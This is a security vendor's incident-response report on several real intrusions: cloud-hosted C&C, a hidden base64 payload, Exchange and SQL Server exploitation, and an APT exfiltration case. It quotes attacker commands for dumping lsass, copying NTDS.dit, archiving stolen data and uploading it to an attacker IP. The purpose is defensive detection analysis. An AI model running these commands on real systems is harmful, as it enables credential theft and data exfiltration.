Skip to content

Server-side attacks, C&C in public clouds and other MDR cases we observed

Introduction

This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.

Command and control via the public cloud

The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.

Case #1: Cloudflare Workers as redirectors

Case description

The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:windowssystem32[legitimate binary name][1].exe.

While investigating, we found that the process had initiated network connections to a potential C&C server:

hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]

The URL format indicates the use of Cloudflare Workers.

We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:

CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:windowsSystem32comsvcs.dll, MiniDump ^%B WindowsTemp[filename].doc full

Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.

The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.

Case detection

The table below lists the signs of suspicious activity that were the starting point for the investigation by the SOC.

MITRE ATT&CK Technique
MDR telemetry event type used
Detection details
Description

T1588.002: Tool

  • AM engine detection on beacon
  • AM verdict: MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter
    A malicious payload was executed in the victim’s system and started communicating with the C&C server

    T1620: Reflective Code Loading

  • AM detection in memory
  • AM verdict: MEM:Trojan.Win64.Cobalt.gen
    The malicious payload migrated to the victim’s memory

  • Process injection
  • Detection of code injection from an unknown binary into a system binary

    T1071.001: Web Protocols

  • HTTP connection
  • Process start
  • Suspicious HTTP connections to the malicious URL: blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level
    The attacker’s communications with the C&C server

    T1584.006: Web Services

  • HTTP connection
  • URL reputation, regular expression in URL
    The attacker’s communications with the C&C server

    T1102.001: Dead Drop Resolver

  • HTTP connection
  • URL reputation, regular expression in URL
    The attacker’s communications with the C&C server

    T1003.001: LSASS Memory

  • AM detection on suspicious activity
  • AM detection on lsass memory access
    The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file

  • Process start
  • Regex on command like: rundll32.exe C:WindowsSystem32comsvcs.dll MiniDump lsass.dmp full

    T1546.003: Windows Management Instrumentation Event Subscription

  • Windows event
  • WMI activity
  • WMI active script event consumer created remotely
    The attacker gained persistence through active WMI

    Payload hidden in long text

    Case #1: A scheduled task that loads content from a long text file

    Case description

    This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.
    Scheduled task:

    MicrosoftWindowsManagementProvisioningYLepG5JS75C8620-1D71-4322-ACE4-45C018679FC9, HKLMSOFTWAREMicrosoftWindows NTCurrentVersionScheduleTaskCacheTasks{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:WindowsSystem32TasksMicrosoftWindowsManagementProvisioningYLepG5JS75C8620-1D71-4322-ACE4-45C018679FC9

    Command:

    "wscript.exe" /e:vbscript /b "C:WindowsSystem32r4RYLepG59B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"

    The scheduled task invokes a VBS script (file path: C:WindowsSystem32r4RYLepG59B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which decodes from the Base64-encoded content of the file C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys, and then executes the latter.

    The VBS script mimics the content and behavior of the legitimate C:WindowsSystem32SyncAppvPublishingServer.vbs file, but the path and file name are different.

    The customer approved our MDR SOC analyst’s request to analyze the file C:WindowsSystem32driversS2cZVnXzpZ2F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content (see the picture below).

    The decoded payload contained a link to a C&C server:

    Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):

    C:Users<… cut out … >DownloadsExcelAnalyzer 3.4.3crackPatch.exe

    The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.

    Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples were now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.

    Case detection

    The table below lists the attack techniques and how they were detected by Kaspersky MDR.

    MITRE ATT&CK Technique
    MDR telemetry event type used
    Detection details
    Description

    T1547.001: Registry Run Keys / Startup Folder

  • Autostart entry
  • Regex on autostart entry details
    Malicious persistence

  • AM detection
  • Heuristic AM engine verdict: HEUR:Trojan.Multi.Agent.gen

    T1059.001: PowerShell

  • Autostart entry
  • Regex on autostart entry details
    Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”

    T1216.001: System Script Proxy Execution

  • Process start
  • Regex on command line
    Malicious payload execution via C:WindowsSystem32
    SyncAppvPublishingSer
    ver.vbs

    T1204.002: Malicious File

  • Process start
  • Execution sequence: svchost.exe
    → explorer.exe → patch.exe
    From directory: C:Users
    DownloadsExcelAnaly
    zer 3.4.3crack
    The user executed a file downloaded by the Tixati BitTorrent client
    As a result, the file 02f4f239-0922-49fe-
    a338-c7460cb37d95.sys was created

  • Local file operation
  • Creation of
    c:usersdownloadsex
    celanalyzer
    3.4.3setup_excelanalyzer.exe
    In this order: chrome.exe →
    tixati.exe

  • Local file operation
  • Creation of 02f4f239-0922-49fe-
    a338-c7460cb37d95.sys
    In this order: svchost.exe →
    patch.exe
    Process command line:
    “C:UsersDownloads
    ExcelAnalyzer
    3.4.3crackPatch.exe”
    The contents of 02f4f239-0922-
    49fe-a338-c7460cb37d95.sys do
    not match the extension (text
    instead of binary).

    T1027: Obfuscated Files or Information
    T1140: Deobfuscate/Decode Files or Information
    The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response
    02f4f239-0922-49fe-a338-
    c7460cb37d95.sys contained text;
    starting on line 4890, it contained
    a Base-64-encoded payload.
    Attacker hid payload

    T1071.001: Web Protocols

  • HTTP connection
  • Network connection
  • The SOC checked for successful connections to the discovered C&C server.
    A search for the attacker’s possible attempts to execute further stages of the attack

    Server-side attacks on the perimeter

    Case #1: A ProxyShell vulnerability in Microsoft Exchange

    Case description

    During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:

    127.0.0.1c$inetpubwwwrootaspnet_clientrqfja.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyecpauthyjiba.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthjiwkl.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentqwezb.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentscriptsqspwi.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentscriptspremiumupxnl.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentthemesqikyp.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyowaauthcurrentthemesresourcesjvdyt.aspx
    c:program filesmicrosoftexchange serverv15frontendhttpproxyecpauthmgsjz.aspx

    The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.

    Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.

    Similar behavior was detected the next day, this time an attempt at creating one file:

    127.0.0.1c$inetpubwwwrootaspnet_clientrmvbe.aspx

    KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.

    Case detection

    The table below lists the attack techniques and how these were detected by Kaspersky MDR.

    MITRE ATT&CK Technique
    MDR telemetry event type used
    Detection details
    Description

    T1190: Exploit Public-Facing Application

  • AM detection
  • Heuristic AM engine verdict: PDM:Exploit.Win32.Generic
    Exploitation attempt

    T1505.003: Web Shell

  • Local file operation
  • Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process
    Web shell file creation

    Case #2: MS SQL Server exploitation

    Case description

    The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21—-181797 (Domain / username).

    The SQL Server process attempted to create a suspicious file:

    c:windowsserviceprofilesmssql$sqlexpressappdatalocaltemptmpd279.tmp

    We observed that a suspicious assembly was loaded to the sqlserver process (c:program filesmicrosoft sql servermssql15.sqlexpressmssqlbinnsqlservr.exe) db_0x2D09A3D665536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16) with the original file name evilclr.dll.

    The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b.

    The SQL server host had previously been seen accessible from the Internet and in the process of being scanned by a TOR network.

    After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands. For example:

    The created SQL jobs attempted to connect to URLs like those shown below:

    hxxp://101.39.<…cut…>.58:16765/2E<…cut…>2F.Png
    hxxp://103.213.<…cut…>.55:15909/2E<…cut…>2F.Png
    hxxp://117.122.<…cut…>.10:19365/2E<…cut…>2F.Png
    hxxp://211.110.<…cut…>.208:19724/2E<…cut…>2F.Png
    hxxp://216.189.<…cut…>.94:19063/2E<.cut...>2F.Png
    hxxp://217.69.<…cut…>.139:13171/2E<…cut…>2F.Png
    hxxp://222.138.<…cut…>.26:17566/2E<…cut…>2F.Png
    hxxp://222.186.<…cut…>.157:14922/2E<…cut…>2F.Png
    hxxp://45.76.<…cut…>.180:17128/2E<…cut…>2F.Png
    hxxp://59.97.<…cut…>.243:17801/2E<…cut…>2F.Png
    hxxp://61.174.<…cut…>.163:15457/2E<…cut…>2F.Png
    hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png
    hxxp://216.189.<…cut…>.94:19063/2E<…cut…>2F.Png
    hxxp://67.21.<…cut…>.130:12340/2E<…cut…>2F.Png

    Some of the IP addresses were already on the deny list, while others were added in response to this incident.

    We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.

    The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b) was detected on another SQL Server host, which was also accessible from the Internet.

    Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.

    Case detection

    The table below lists the attack techniques and how these were detected by Kaspersky MDR.

    MITRE ATT&CK Technique
    MDR telemetry event type used
    Detection details
    Description

    T1090.003: Multi-hop Proxy
    T1595.002: Vulnerability Scanning

  • Network connection
  • AM detection
  • Reputation analysis showed the use of TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine.
    The attacker scanned the SQL Server host

    T1190: Exploit Public-Facing Application

  • Process start
  • The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe
    The attacker successfully exploited the SQL server

  • Autostart entry
  • Execution of the object previously detected as an autostart entry with a bad reputation: sql:SQLEXPRESSdb_0x2D09A3D665537_fscbd; original file name: evilclr.dll

    T1059.001: PowerShell

  • Autostart entry
  • Process start
  • Command line analysis showed the use of PowerShell.
    Malicious persistence via an SQL Server job

    T1027: Obfuscated Files or Information

  • Autostart entry
  • Regex- and ML-based analysis of the SQL Server Agent job command line
    The attacker attempted to evade detection

  • Process start
  • Regex- and ML-based analysis of the services.exe → sqlservr.exe → powershell.exe execution sequence command line

    T1505.001: SQL Stored Procedures

  • Autostart entry
  • SQL Server Agent job analysis
    Malicious persistence via an SQL Server job

  • AM detection
  • AM detection on suspicious activity
  • Heuristic detects on PowerShell SQL Server Agent; verdict: HEUR:Trojan.Multi.Powecod.a

    T1071.001: Web Protocols

  • HTTP connection
  • AM detection
  • The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server.
    The attacker’s C&C server

    What does exfiltration in a real-life APT look like?

    Case #1: Collecting and stealing documents

    Case description

    Kaspersky MDR detected suspicious activity on one particular host in customer infrastructure, as the following process was started remotely by psexec:

    “cmd.exe” /c “c:perflogs1.bat”, which started:

    findstr  "10.<…cut…>.
    wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]"  /c:1 
    wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1

    After that, the following inventory commands were executed by the binary C:ProgramDataUSOPrivate UpdateStorewindnphd.exe:

    C:Windowssystem32cmd.exe /C ping 10.<…cut…> -n 2 
    query  user 
    C:Windowssystem32cmd.exe /C tasklist /S 10.<…cut…> -U <domain><username3> -P <password>   
    C:Windowssystem32cmd.exe /C net use 10.<…cut…>ipc$ "<password>" /u:<domain><username3>    
    C:Windowssystem32cmd.exe /C net group "domain admins" /domain    
    C:Windowssystem32cmd.exe /C ping <hostname1>    
    C:Windowssystem32cmd.exe /C vssadmin list shadows    
    C:Windowssystem32cmd.exe /C ipconfig /all    
    C:Windowssystem32cmd.exe /C dir 10.<…cut…>c$

    Suspicious commands triggering actions in the Active Directory Database were executed:

    C:Windowssystem32cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit  
    C:Windowssystem32cmd.exe /C dir c:windowssystem32ntds.dit 
    C:Windowssystem32cmd.exe /C dir c:  
    C:Windowssystem32cmd.exe /C dir c:windowsntdsntds.dit

    After these commands were executed, the windnphd.exe process started an HTTP connection:

    hxxp[:]//31.192.234[.]60:53/useintget

    Then a suspicious file, c:userspublicnd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:

    nd.exe  c:windowssystem32configsystem c:userspublicsys.txt   
    nd.exe  c:windowsntdsntds.dit c:userspublicnt.txt 
    C:Windowssystem32cmd.exe /C move *.txt c:userspublictmp   
    C:Windowssystem32cmd.exe /C rar.exe a -k -r -s -m1  c:userspublicn.rar   c:userspublictmp 
    rar.exe  a -k -r -s -m1  c:userspublicn.rar   c:userspublictmp

    Later, the SOC observed that a suspicious scheduled task had been created on the same host:

    schtasks  /create  /sc minute /mo 30 /ru system  /tn tmp /tr "c:userspublics.exe c:userspublic816-s.rar 38[.]54[.]14[.]183 53 down"  /f

    The task executed a suspicious file: c:userspublics.exe (MD5 6C62BEED54DE668234316FC05A5B2320)

    This executable used the archive c:userspublic816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.

    The 0816-s.rar archive was created via remote execution of the following command through psexec:

    rar a -k -r -s -ta[Pass_in_clear_text] -m1  c:userspublic816-s.rar   "10.<…cut…>c$users<username4>Documents<DocumentFolder1>"

    After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.

    Similar suspicious behavior was detected on another host, .

    First, a suspicious file was created over the SMB protocol: c:userspublicwinpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).

    Next, a task was created remotely via psexec.exe:

    schtasks  /create  /sc minute /mo 30 /ru system  /tn tmp /tr "c:userspublicwinpdasd.exe"  /f

    During task execution, an external network communication was detected, and certain discovery commands were executed:

    hxxp://31[.]192.234.60:53/useintget
    ping  10.<…cut…> -n 1
    query  user
    net  use

    This was followed by a connection to a network share on the host 10. as username3:

    C:Windowssystem32cmd.exe /C net use 10.<…cut…>ipc$ "<password>" /u:<domain><username3>

    More reconnaissance command executions were detected:

    C:Windowssystem32cmd.exe /C dir 10.<…cut…>c$users<username4>AppDataRoamingAdobeLinguistics
    C:Windowssystem32cmd.exe /C tasklist /S 10.<…cut…> -U <domain><username3> -P <password> |findstr rundll32.exe
    tasklist  /S 10.<…cut…> -U <domain><username3> -P <password>
    C:Windowssystem32cmd.exe /C taskkill /S 10.<…cut…> -U <domain><username3> -P <password> /pid <PID> /f
    C:Windowssystem32cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain><username3> /p "<password>" /tn MicrosoftWindowsTcpipdcrpytod

    Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:

    C:Windowssystem32cmd.exe /C schtasks /create  /sc minute /mo 30 /ru system  /tn MicrosoftWindowsNetworkwindpch /tr "C:UsersadminAppDataRoamingMicrosoftNetworkwindpchsvc.exe"  /f

    After that, C&C communications were detected:

    hxxp://139.162.35[.]70:53/micsoftgp

    This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.

    Case detection

    The table below lists the attack techniques and how these were detected by Kaspersky MDR.

    MITRE ATT&CK Technique
    MDR telemetry event type used
    Detection details
    Description

    T1569.002: Service Execution

  • Process start
  • Command line analysis
    The attacker performed reconnaissance and search in local logs
    The attacker persisted in the victim’s system through service creation

  • Windows event
  • Windows events on service installation and service start

  • AM detection on suspicious activity
  • AM behavior analysis
    The attacker executed windnphd.exe through psexec

    T1592: Gather Victim Host Information
    T1590: Gather Victim Network Information

  • Process start
  • Command line analysis
    The attacker performed internal reconnaissance

    T1021.002: SMB/Windows Admin Shares

  • Share access
  • Inbound and outbound share access
    The attacker tried to access:
    10..65ipc$
    10..52c$

    T1003.003: NTDS

  • Process start
  • Command line analysis
    The attacker accessed NTDS.dit with ntdsutil

    T1071.001: Web Protocols

  • HTTP connection
  • Network connection
  • The SOC checked if the data transfer was successful
    The attacker communicated with the C&C server at hxxp[:]//31.192.234[
    .]60:53/useintget

  • AM detection on suspicious activity
  • The connection was initiated by the suspicious process windnphd.exe

    T1571: Non-Standard Port

  • HTTP connection
  • Network connection
  • The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port
    Attacker used the C&C server hxxp[:]//31.192.234[
    .]60:53/useintget

    T1587.001: Malware

  • Local file operation
  • Process start
  • AM detection on suspicious activity
  • Use of various suspicious binaries prepared by the attacker specifically for this attack
    The attacker used custom tools:
    s.exe
    winpdasd.exe
    windpchsvc.exe
    (see detailed report below)

    T1497: Virtualization/Sandbox Evasion

  • Malware analysis
  • Detected the HookSleep function (see below)
    The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools: winpdasd.exe and windpchsvc.exe

    T1036.005: Match Legitimate Name or Location

  • Local file operation
  • Malware analysis
  • Operations with the file c:usersDefaultntusers.dat
    The attacker attempted to hide a shellcode inside a file with a name similar to the legitimate ntuser.dat

    T1140: Deobfuscate/Decode Files or Information

  • Local file operation
  • Malware analysis
  • The file ntusers.dat contained an encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe
    The attacker executed arbitrary code

    T1560.001: Archive via Utility

  • Process start
  • Use of the RAR archiver for data collection
    The attacker archived the stolen credentials and documents

    T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol

  • Process start
  • Command line analysis
    The attacker used a custom tool to exfiltrate data

  • Network connection
  • Analysis of the process that initiated the connection

    An analysis of the custom tools used by the attacker

    windpchsvc.exe and winpdasd.exe

    Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.

    Both files read in from a file intended to deceive investigators and users by applying naming conventions that are similar to system files:

    Payload file for windpchsvc.exe

    The malware, windpchsvc.exe, reads from the file c:usersDefaultntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.

    A similar file name was used for the winpdasd.exe malware:

    Payload file for winpdasd.exe

    The malware reads from this file and decodes the bytes for direct execution via a function call as seen below (call [ebp+payload_alloc] and call esi ):

    windpchsvc.exe: decode, allocate memory, copy to mem, execute

    winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

    The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.

    Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.

    The decompiled function can be seen below:

    The “HookSleep” function found in both files, decompiled

    When debugging, this worked as expected. The Win32 Sleep function is directed to the defined function in the malware:

    The Sleep function redirected back to the malware code

    s.exe

    This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:

    s.exe <file> <IP address> <port> <up|down>

    This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and output to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.

    The algorithm is pretty simple: network startup, parse arguments, create socket, send file or wait for file based on arguments. The decompiled main function can be seen below:

    Decompiled network transfer tool

    [1] The actual name of the binary is unimportant; hence it was skipped.
    [2] Kaspersky Endpoint Security efficiently protects LSASS memory.

    Source:: Securelist